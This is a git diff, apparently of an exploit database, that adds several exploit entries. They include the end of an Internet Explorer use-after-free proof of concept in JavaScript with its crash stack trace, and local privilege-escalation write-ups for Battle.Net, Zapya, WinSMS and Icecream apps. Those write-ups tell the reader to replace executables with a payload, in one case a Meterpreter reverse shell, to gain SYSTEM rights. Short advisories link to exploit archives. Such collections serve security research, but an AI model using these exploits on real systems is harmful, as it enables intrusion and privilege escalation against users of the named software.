1feac7b0 6dae9665 341a8bb0 00000000 00000000 MSHTML!COmWindowProxy::SwitchMarkup+0x4eb
|
||||
1feac894 6dae97e3 00005004 ffffffff 00000000 MSHTML!COmWindowProxy::ExecRefresh+0xa1c
|
||||
1feac8a8 6d0d763b 457f1f68 00005004 00000001 MSHTML!COmWindowProxy::ExecRefreshCallback+0x23
|
||||
1feac8f0 6d0cd4e2 91c55b56 00000000 6d0cc800 MSHTML!GlobalWndOnMethodCall+0x17b
|
||||
1feac944 76b862fa 001401c6 00008002 00000000 MSHTML!GlobalWndProc+0x103
|
||||
1feac970 76b86d3a 6d0cc800 001401c6 00008002 user32!InternalCallWinProc+0x23
|
||||
1feac9e8 76b877d3 00000000 6d0cc800 001401c6 user32!UserCallWinProcCheckWow+0x109
|
||||
1feaca4c 76b8789a 6d0cc800 00000000 1feafc28 user32!DispatchMessageWorker+0x3cb
|
||||
1feaca5c 6e5fa8ac 1feaca9c 62382e48 2efb2fe0 user32!DispatchMessageW+0xf
|
||||
1feafc28 6e620e88 1feafcf4 6e620b00 5cba2ff0 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464
|
||||
1feafce8 74e4ad3c 62382e48 1feafd0c 6e614b00 IEFRAME!LCIETab_ThreadProc+0x3e7
|
||||
1feafd00 6e593a31 5cba2ff0 00000000 6e5939a0 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1c
|
||||
1feafd38 6fae9608 4b3b6fe8 705e0368 00000000 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94
|
||||
|
||||
############################################################################################
|
||||
*/
|
||||
|
||||
var doc;
|
||||
var trg, trg_parent;
|
||||
function testcase()
|
||||
{
|
||||
var e1_frame = document.getElementById("e1");
|
||||
doc = document;
|
||||
|
||||
e = e1_frame.contentWindow.document.createElement("hr");
|
||||
rf = doc.body.appendChild(e);
|
||||
|
||||
e = e1_frame.contentWindow.document.createElement("audio");
|
||||
rf = doc.body.appendChild(e);
|
||||
|
||||
dom = doc.getElementsByTagName("*");
|
||||
document.getElementById("e1").removeNode(true);
|
||||
trg = dom[14];
|
||||
trg_parent = doc.body;
|
||||
|
||||
trg.addEventListener('DOMNodeRemoved',
|
||||
new Function('',
|
||||
//'try{trg.removeEventListener("DOMNodeRemoved",this,false);}catch(e){}'+
|
||||
'try{trg.appendChild(document.createElement("feOffset")).removeNode(false).ATTRIBUTE_NODE = "false";}catch(e){}'+
|
||||
'try{trg_parent = trg.cloneNode(true);}catch(e){}'//+
|
||||
// 'try{doc = document.implementation.createDocument("about:blank","","text/html");}catch(e){}'
|
||||
),
|
||||
false);
|
||||
trg_parent.innerHTML = trg.innerHTML;
|
||||
//CollectGarbage();
|
||||
//trg.innerHTML = "<h1></h1>"
|
||||
setTimeout('location.reload();',700);
|
||||
}
|
||||
</script>
|
||||
<title>Use After Free</title>
|
||||
</head>
|
||||
<body onload='testcase();'>
|
||||
<iframe></iframe><iframe src='about:blank' id='e1'></iframe>
|
||||
</body>
|
||||
</html>
|
||||
</html>
|
59
platforms/windows/local/40362.txt
Executable file
59
platforms/windows/local/40362.txt
Executable file
|
@ -0,0 +1,59 @@
|
|||
# Exploit Title: Battle.Net 1.5.0.7963 Local Privilege Escalation
|
||||
# Date: 11/09/2016
|
||||
# Exploit Author: Tulpa
|
||||
# Contact: tulpa@tulpa-security.com
|
||||
# Author website: www.tulpa-security.com
|
||||
# Vendor Homepage: www.battle.net
|
||||
# Software Link: https://eu.battle.net/account/download/
|
||||
# Version: Version 1.5.0.7963
|
||||
# Tested on: Windows 10 Professional x64 and Windows XP SP3 x86
|
||||
|
||||
|
||||
1. Description:
|
||||
|
||||
Battle.Net installs by default to "C:\Program Files (x86)\Battle.Net" with weak folder permissions granting any built-in user account with full permission to the contents of
|
||||
|
||||
the directory and it's subfolders. This allows an attacker opportunity for their own code execution under any other user running the application. This is not limited to just
|
||||
|
||||
the Battle.Net directory, but also to any of Blizzards game installation folders as installed by Battle.Net.
|
||||
|
||||
2. Proof
|
||||
|
||||
C:\Program Files>cacls Battle.net
|
||||
C:\Program Files\Battle.net BUILTIN\Users:(OI)(CI)F
|
||||
BUILTIN\Administrators:(OI)(CI)F
|
||||
CREATOR OWNER:(OI)(CI)F
|
||||
|
||||
|
||||
C:\Program Files>cacls "Diablo III"
|
||||
C:\Program Files\Diablo III BUILTIN\Users:(OI)(CI)F
|
||||
BUILTIN\Administrators:(OI)(CI)F
|
||||
CREATOR OWNER:(OI)(CI)F
|
||||
|
||||
|
||||
C:\Program Files>cacls "StarCraft II"
|
||||
C:\Program Files\StarCraft II BUILTIN\Users:(OI)(CI)F
|
||||
BUILTIN\Administrators:(OI)(CI)F
|
||||
CREATOR OWNER:(OI)(CI)F
|
||||
|
||||
|
||||
C:\Program Files>cacls Hearthstone
|
||||
C:\Program Files\Hearthstone BUILTIN\Users:(OI)(CI)F
|
||||
BUILTIN\Administrators:(OI)(CI)F
|
||||
CREATOR OWNER:(OI)(CI)F
|
||||
|
||||
|
||||
C:\Program Files>cacls "Heroes of the Storm"
|
||||
C:\Program Files\Heroes of the Storm BUILTIN\Users:(OI)(CI)F
|
||||
BUILTIN\Administrators:(OI)(CI)F
|
||||
CREATOR OWNER:(OI)(CI)F
|
||||
|
||||
C:\Program Files (x86)>cacls "World of Warcraft"
|
||||
C:\Program Files (x86)\World of Warcraft BUILTIN\Users:(OI)(CI)F
|
||||
BUILTIN\Administrators:(OI)(CI)F
|
||||
CREATOR OWNER:(OI)(CI)F
|
||||
|
||||
3. Exploit:
|
||||
|
||||
Simply replace any of the game exe's or any of the dll's with your preferred payload and wait for execution.
|
||||
|
27
platforms/windows/local/40365.txt
Executable file
27
platforms/windows/local/40365.txt
Executable file
|
@ -0,0 +1,27 @@
|
|||
# Exploit Title: Zapya Desktop Version ('ZapyaService.exe') Privilege Escalation
|
||||
# Date: 2016/9/12
|
||||
# Exploit Author: Arash Khazaei
|
||||
# Vendor Homepage: http://www.izapya.com/
|
||||
# Software Link: http://binaries.izapya.com/Izapya/Windows_PC/ZapyaSetup_1803_en.exe
|
||||
# Version: 1.803 (Latest)
|
||||
# Tested on: Windows 7 Professional X86 - Windows 10 Pro X64
|
||||
# CVE : N/A
|
||||
|
||||
======================
|
||||
# Description :
|
||||
# Zapya is a 100% free tool for sharing files across devices like Android, iPhone, iPad, Window’s Phone, PC, and Mac computers in an instant.
|
||||
# It’s Easy to use and supports multiple languages. We are already a community of 300 million strong users and growing rapidly.
|
||||
# When You Install Zapya Desktop , Zapya Will Install A Service Named ZapyaService.exe And It's Placed In Zapya Installation Directory .
|
||||
# If We Replace The ZapyaService.exe File With A Malicious Executable File It Will Execute As NT/SYSTEM User Privilege.
|
||||
======================
|
||||
|
||||
# Proof Of Concept :
|
||||
# 1- Install Zapya Desktop .
|
||||
# 2- Generate A Meterpreter Executable Payload .
|
||||
# 3- Stop Service And Replace It With ZapyaService.exe With Exact Name.
|
||||
# 4- Listen Handler For Connection And Start Service Again or Open Zapya Desktop , Application Will Attempt To Start Service
|
||||
# 5- After Starting Service We Have Reverse Meterpreter Shell With NT/SYSTEM Privilege.
|
||||
|
||||
==================
|
||||
# Discovered By Arash Khazaei
|
||||
==================
|
41
platforms/windows/local/40375.txt
Executable file
41
platforms/windows/local/40375.txt
Executable file
|
@ -0,0 +1,41 @@
|
|||
# Exploit Title: WinSMS 3.43 Local Privilege Escalation
|
||||
# Date: 13/09/2016
|
||||
# Exploit Author: Tulpa
|
||||
# Contact: tulpa@tulpa-security.com
|
||||
# Author website: www.tulpa-security.com
|
||||
# Vendor Homepage: http://www.winsms.co.za
|
||||
# Software Link: https://www.winsms.co.za/products/bulk-sms-desktop-software/
|
||||
# Version: Software Version 3.43, Released September 2015
|
||||
# Tested on: Windows 10 Professional x64 and Windows XP SP3 x86
|
||||
|
||||
|
||||
1. Description:
|
||||
|
||||
WinSMS installs by default to "C:\Program Files (x86)\WinSMS" with very weak folder permissions granting any user full permission to the contents of the directory and it's subfolders. This allows ample opportunity for code execution against any other user running the application. WinSMS is typically configured as a startup program which makes this particularly easy to take leverage.
|
||||
|
||||
2. Proof
|
||||
|
||||
C:\Program Files>cacls WinSMS
|
||||
C:\Program Files\WinSMS Everyone:(OI)(CI)F
|
||||
BUILTIN\Users:R
|
||||
BUILTIN\Users:(OI)(CI)(IO)(special access:)
|
||||
GENERIC_READ
|
||||
GENERIC_EXECUTE
|
||||
BUILTIN\Power Users:C
|
||||
BUILTIN\Power Users:(OI)(CI)(IO)C
|
||||
BUILTIN\Administrators:F
|
||||
BUILTIN\Administrators:(OI)(CI)(IO)F
|
||||
NT AUTHORITY\SYSTEM:F
|
||||
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)F
|
||||
TULPA-842269BBB\Administrator:F
|
||||
CREATOR OWNER:(OI)(CI)(IO)F
|
||||
|
||||
|
||||
3. Exploit:
|
||||
|
||||
Simply replace WinSMS.exe or any of the dll's with your preferred payload and wait for execution.
|
||||
|
||||
4. Plain Text Password Disclosure:
|
||||
|
||||
It is worth noting that sensitive information such as the proxy server password is stored in plain text within the a database file located at "C:\Program Files (x86)\WinSMS\WinSMS.mdb"
|
||||
|
69
platforms/windows/local/40376.txt
Executable file
69
platforms/windows/local/40376.txt
Executable file
|
@ -0,0 +1,69 @@
|
|||
# Exploit Title: Multiple Icecream Apps Local Privilege Escalation
|
||||
# Date: 13/09/2016
|
||||
# Exploit Author: Tulpa
|
||||
# Contact: tulpa@tulpa-security.com
|
||||
# Author website: www.tulpa-security.com
|
||||
# Vendor Homepage: icecreamapps.com
|
||||
# Software Versions Affected: Icecream Ebook Reader 4.21 | Icecream Screen Recorder 4.21 | Icecream Screen Recorder 2.12
|
||||
# Software Link: http://icecreamapps.com/Ebook-Reader/ | http://icecreamapps.com/Screen-Recorder/ | http://icecreamapps.com/Slideshow-Maker/
|
||||
# Tested on: Windows 10 Professional x64 and Windows XP SP3 x86
|
||||
|
||||
|
||||
1. Description:
|
||||
|
||||
The default installation directory for Icecream Ebook Reader is "C:\Program Files (x86)\Icecream Ebook Reader" with weak folder permissions that grants EVERYONE change/modify
|
||||
|
||||
privileges to the contents of the directory and it's subfolders. This allows an attacker opportunity for their own code execution under any other user running the
|
||||
|
||||
application. The same vulnerability exists for "Icecream Screen Recorder" as well as "Icecream Slideshow Maker".
|
||||
|
||||
2. Proof
|
||||
|
||||
C:\Program Files (x86)>icacls "Icecream Ebook Reader"
|
||||
Icecream Ebook Reader Everyone:(OI)(CI)(M)
|
||||
NT SERVICE\TrustedInstaller:(I)(F)
|
||||
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
|
||||
NT AUTHORITY\SYSTEM:(I)(F)
|
||||
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
|
||||
BUILTIN\Administrators:(I)(F)
|
||||
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
|
||||
BUILTIN\Users:(I)(RX)
|
||||
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
|
||||
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
|
||||
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
|
||||
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
|
||||
|
||||
C:\Program Files (x86)>icacls "Icecream Screen Recorder"
|
||||
Icecream Screen Recorder Everyone:(OI)(CI)(M)
|
||||
NT SERVICE\TrustedInstaller:(I)(F)
|
||||
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
|
||||
NT AUTHORITY\SYSTEM:(I)(F)
|
||||
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
|
||||
BUILTIN\Administrators:(I)(F)
|
||||
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
|
||||
BUILTIN\Users:(I)(RX)
|
||||
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
|
||||
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
|
||||
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
|
||||
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
|
||||
|
||||
C:\Program Files\Icecream Slideshow Maker Everyone:(OI)(CI)C
|
||||
BUILTIN\Users:R
|
||||
BUILTIN\Users:(OI)(CI)(IO)(special access:)
|
||||
GENERIC_READ
|
||||
GENERIC_EXECUTE
|
||||
BUILTIN\Power Users:C
|
||||
BUILTIN\Power Users:(OI)(CI)(IO)C
|
||||
BUILTIN\Administrators:F
|
||||
BUILTIN\Administrators:(OI)(CI)(IO)F
|
||||
NT AUTHORITY\SYSTEM:F
|
||||
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)F
|
||||
TULPA-842269BBB\Administrator:F
|
||||
CREATOR OWNER:(OI)(CI)(IO)F
|
||||
|
||||
|
||||
|
||||
3. Exploit:
|
||||
|
||||
Simply replace any of the application exe's or any of the dll's with your preferred payload and wait for execution.
|
||||
|
|
@ -1,9 +0,0 @@
|
|||
source: http://www.securityfocus.com/bid/1976/info
|
||||
|
||||
Windows Media Player is an application used for digital audio, and video content viewing.
|
||||
|
||||
It is possible for a user running Windows Media Player 7 to enable a skin (.wms) file and unknowingly execute an embedded malicious script. When a user attempts to retrieve a skin (.wms) file it is downloaded and resides on the user's local machine. If Windows Media Player is run with the malicious skin enabled, the Active X component would allow any arbitrary action to be achieved. Depending on internet security settings this vulnerability is also exploitable if the skin file in question resides on a web site. The script could automatically launch when a user visits the web site.
|
||||
|
||||
Execution of arbitrary scripts could make it possible for the malicious host to gain rights equivalent to those of the current user.
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20424.zip
|
|
@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7539/info
|
|||
|
||||
Internet Explorer is reported to be vulnerable to a zone bypass issue. Allegedly, if Internet Explorer attempts to open a web page containing numerous 'file://' requests each contained in a separate Iframe, the requested file will eventually be executed in the Local Computer zone.
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22575.rar
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22575.rar (dmz.rar Password: zones)
|
Loading…
Add table
Reference in a new issue